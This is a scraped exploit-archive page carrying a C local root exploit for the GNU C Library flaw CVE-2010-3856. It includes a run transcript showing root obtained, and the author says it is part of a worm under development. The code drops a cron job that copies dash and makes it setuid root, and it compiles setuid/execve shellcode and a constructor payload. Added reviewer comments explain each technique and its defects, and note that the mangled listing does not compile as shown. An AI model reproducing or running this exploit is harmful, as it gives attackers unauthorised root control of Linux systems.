[local exploits] - GNU C Library local root (uid=0,gid=0) Exploit
Posted on 04 December 2010
"https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>============================================== GNU C Library local root (uid=0,gid=0) Exploit ============================================== GNU C Library local root (uid=0,gid=0) exploit bug found by tavis ormandy exploit code by devilzc0de software url: http://www.gnu.org/software/libc/ Category: local tested on sh-3.2# cat /etc/issue Debian GNU/Linux 5.0 l [code] /** #Exploit Title: GNU C Library local root (uid=0,gid=0) exploit #date: 04-12-10 #author: devilzc0de #bugs found by: Tavis Ormandy (taviso@sdf.lonestar.org) # Tested on: Debian GNU/Linux 5.0 #CVE: 2010-3856 #vulnerable : GNU C library a basic exploit made by: devilzc0de (www.devilzc0de.org) special thanks to all devilzc0de crews and members, glodhaxors crews and members tis is part of my worm (currently making dual os worm for 7 months) mywisdom@DL:~/sploit$ id uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom) mywisdom@DL:~/sploit$ ./glibc GLIBC local privilege escalation exploit Bugs found by Tavis Ormandy made by: devilzc0de.org ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface or address] [-M mtu discovery hint] [-S sndbuf] [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination [+]waiting for dropped suid shell from our cron daemon, please wait ... 
sh-3.2# id
 uid=0(root) gid=0(root) groups=1001(mywisdom)
 sh-3.2#
 **/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * NOTE(review): this listing was mangled by the site it was scraped from.
 * Backslash escapes inside string literals are gone (the shellcode below
 * reads "x6ax17..." instead of "\x6a\x17...", the embedded double quotes
 * in str2 and str are unescaped, and the banner printf()s presumably had
 * "\n"s — the transcript shows them on separate lines). It therefore does
 * not compile as shown. The comments below describe what each piece is
 * meant to do and the defects a reviewer would flag; they do not repair it.
 */

/* Print the banner (three printf() calls, no newline as published). */
void salam() {
    printf(" GLIBC local privilege escalation exploit ");
    printf(" Bugs found by Tavis Ormandy ");
    printf(" made by: devilzc0de.org ");
}

/*
 * Technique 1 (the CVE-2010-3856 path named in the header).
 *
 * Runs setuid ping with LD_AUDIT=libpcprofile.so and PCPROFILE_OUTPUT
 * pointing into /etc/cron.d. ld.so rejects libpcprofile.so as an audit
 * module (see the "undefined symbol: la_version; ignored" line in the
 * transcript above); the intent is that its initializer has already
 * opened PCPROFILE_OUTPUT for writing with ping's root privileges,
 * leaving a root-created file at /etc/cron.d/w00t. umask(0) below is
 * what makes that file world-writable, so the unprivileged `echo` further
 * down can replace its contents with a cron job.
 *
 * Falls back to eksplo2() when libpcprofile.so or the cron file is
 * missing; eksplo2() returns, so the checks after it still run.
 *
 * Review notes (defects as published):
 *  - every popen() is fire-and-forget: the child runs asynchronously and
 *    is never pclose()d, so each stat() below can race the gcc / ping /
 *    echo it depends on, and each call leaks a pipe and a zombie child;
 *  - usleep(60000000): POSIX only guarantees usleep() for arguments below
 *    1,000,000 us; sleep(60) is the portable spelling;
 *  - `i` is unused;
 *  - nothing is cleaned up afterwards: /etc/cron.d/w00t (still firing
 *    every minute), the setuid-root /tmp/gotroot, /tmp/suidshell and
 *    ./suid.c stay on disk — useful indicators for anyone investigating
 *    a host this was run on.
 */
void eksplo1() {
    int i;
    struct stat bufer;
    umask(0);                                    /* so the root-created cron file is 0666 */
    bikin_payload1();                            /* writes suid.c, compiles /tmp/suidshell (gcc not waited for) */
    popen("dpkg -S /lib/libpcprofile.so","r");   /* output never read; the stat() below is the real check */
    if(stat("/lib/libpcprofile.so",&bufer)!=0) {
        eksplo2();
    } else {
        /* setuid ping loads the library; PCPROFILE_OUTPUT is created as root */
        popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
    }
    if(stat("/etc/cron.d/w00t",&bufer)!=0) {     /* may run before ping has finished */
        eksplo2();
    } else {
        if(stat("/tmp/suidshell",&bufer)!=0) {   /* may run before gcc has finished */
            exit(1);
        } else {
            /* Overwrite the root-created, world-writable file with a job
             * cron runs every minute as root: copy dash and make it
             * setuid root. */
            popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot ' > /etc/cron.d/w00t", "r");
        }
        printf("[+]waiting for dropped suid shell from our cron daemon, please wait ... ");
        usleep(60000000);                        /* one cron cycle; non-portable, see note above */
        /* Presumably dash was chosen because, unlike bash, it keeps the
         * setuid euid; suidshell then calls setuid(0) to make uid 0 real. */
        system("/tmp/./gotroot -c /tmp/./suidshell");
    }
}

/*
 * Write ./suid.c and compile it to /tmp/suidshell (the gcc runs in an
 * un-waited popen() child). The source is a tiny loader that jumps into
 * i386 shellcode; reading the mangled literal two hex digits at a time,
 * the bytes decode as
 *   6a 17 58 31 db cd 80                    -> setuid(0)        (syscall 23)
 *   6a 2e 58 53 cd 80                       -> setgid(0)        (syscall 46)
 *   31 d2 6a 0b 58 52 68 2f2f7368 68 2f62696e
 *   89 e3 52 53 89 e1 cd 80                 -> execve("/bin//sh", {"/bin//sh", NULL}, NULL)
 * Declared int but returns nothing; fopen() is not checked for NULL.
 */
int bikin_payload1() {
    FILE *fp2;
    const char *str2 ="char shellcode[] ="x6ax17x58x31xdbxcdx80x6ax2ex58x53xcdx80x31xd2x6ax0bx58x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53x89xe1xcdx80";int main(){int (*f)() = (int(*)())shellcode;f();}";
    fp2 = fopen("suid.c", "w");
    fwrite(str2, 1, strlen(str2), fp2);
    fclose(fp2);
    popen("gcc -o /tmp/suidshell suid.c","r");
}

/*
 * Write ./payload.c — a shared object whose constructor runs
 * setuid(0); system("/bin/bash") — and compile it to /tmp/exploit, again
 * via an un-waited popen(). Only eksplo2() uses it: /tmp/exploit is the
 * path "$ORIGIN" is meant to expand to there. Declared int but returns
 * nothing; fopen() is not checked for NULL.
 */
int bikin_payload2() {
    FILE *fp;
    const char *str ="void __attribute__((constructor)) init(){ setuid(0);system("/bin/bash");}";
    fp = fopen("payload.c", "w");
    fwrite(str, 1, strlen(str), fp);
    fclose(fp);
    popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");
}

/*
 * Remove leftovers of a previous run: the two generated sources and
 * /tmp/exploit. remove() on a directory is rmdir(), so a non-empty
 * /tmp/exploit is left in place without any error being reported.
 */
void il_fil_de() {
    struct stat buf;
    if(stat("payload.c",&buf)==0) {
        remove("payload.c");
    }
    if(stat("suid.c",&buf)==0) {
        remove("suid.c");
    }
    if(stat("/tmp/exploit",&buf)==0) {
        remove("/tmp/exploit");
    }
}

/*
 * Technique 2: the "$ORIGIN" trick. The idea: hard-link setuid ping as
 * /tmp/exploit/target, keep a descriptor open on it, delete the
 * directory, place the payload .so at /tmp/exploit, then exec the open
 * descriptor with LD_AUDIT="$ORIGIN" so that $ORIGIN expands to
 * /tmp/exploit — now the attacker's library — and it is loaded into the
 * setuid process. (ln makes a hard link, so /tmp must be on the same
 * filesystem as /bin.)
 *
 * Review notes: as published this path cannot succeed:
 *  - `exec 3< ...` runs in its own popen() child shell, which exits as
 *    soon as the command string ends; neither this process nor the later
 *    popen() child inherits fd 3, so /proc/self/fd/3 does not exist when
 *    the final command runs. All steps would have to run in one shell;
 *  - the second remove("/tmp/exploit") is rmdir() on a directory that now
 *    contains `target`, so it fails with ENOTEMPTY and gcc in
 *    bikin_payload2() is asked to write a file over a directory;
 *  - the LD_AUDIT literal is mangled (unescaped inner quotes);
 *  - declared int but returns nothing.
 */
int eksplo2() {
    remove("/tmp/exploit");
    popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
    popen("exec 3< /tmp/exploit/target","r");    /* fd 3 dies with this child */
    remove("/tmp/exploit");                      /* ENOTEMPTY: target is inside */
    bikin_payload2();                            /* wants to create /tmp/exploit as a file */
    popen("LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3","r");
}

/*
 * Entry point: print the banner, clear artifacts of a previous run,
 * create /tmp/exploit (mode subject to the inherited umask; eksplo1()
 * only clears it later) and choose technique 1 when /etc/cron.d exists,
 * technique 2 otherwise. argv is declared as char **argv[] (three
 * levels of indirection) — wrong but harmless since it is never used.
 * No return statement.
 */
int main(int argc,char **argv[]) {
    struct stat buf;
    salam();
    il_fil_de();
    mkdir("/tmp/exploit",0777);
    if(stat("/etc/cron.d",&buf)!=0) {
        eksplo2();
    } else {
        eksplo1();
    }
}
[/code]